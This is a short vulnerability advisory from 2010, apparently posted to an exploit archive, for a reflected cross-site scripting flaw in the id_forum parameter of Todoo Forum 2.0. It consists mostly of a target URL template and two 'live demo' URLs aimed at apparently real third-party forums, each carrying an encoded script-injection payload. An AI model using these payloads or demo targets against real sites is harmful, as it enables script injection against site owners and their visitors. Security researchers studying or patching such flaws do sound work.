Todoo Forum 2.0 Cross Site Scripting Vulnerability
Posted on 09 March 2010
================================================== Todoo Forum 2.0 Cross Site Scripting Vulnerability ================================================== [+] ~ Note : [ Tribute to the martyrs of Gaza . ] ========== [+] Todoo Forum 2.0 [xss] Cross Site Scripting Vulnerability ========== [+] Script: [ Todoo Forum ] [+] Language: [ PHP ] [+] Site page: [ Todooforum est un forum [+] Download: [ http://www.todoomasters.com/scripts/todooforum.zip ] ############## ===[ Exploit ]=== [+] http://[target].com/[path]/todooforum.php?cat=post&id_forum=[Xss Vuln] ===[ Live Demo ]=== [+] http://membres.multimania.fr/ps2foreverall/forum/forum.php?cat=post&id_foru m=%22%3E%3Cscript%3Ealert(1);%3C/script%3E [+] http://aslg.aslpaintball.fr/forum/forum.php?cat=post&id_forum=%22%3E%3Cscri pt%3Ealert(1);%3C/script%3E Author: ViRuSMaN <- ############## # ~ - [ [ : Inj3ct0r : ] ]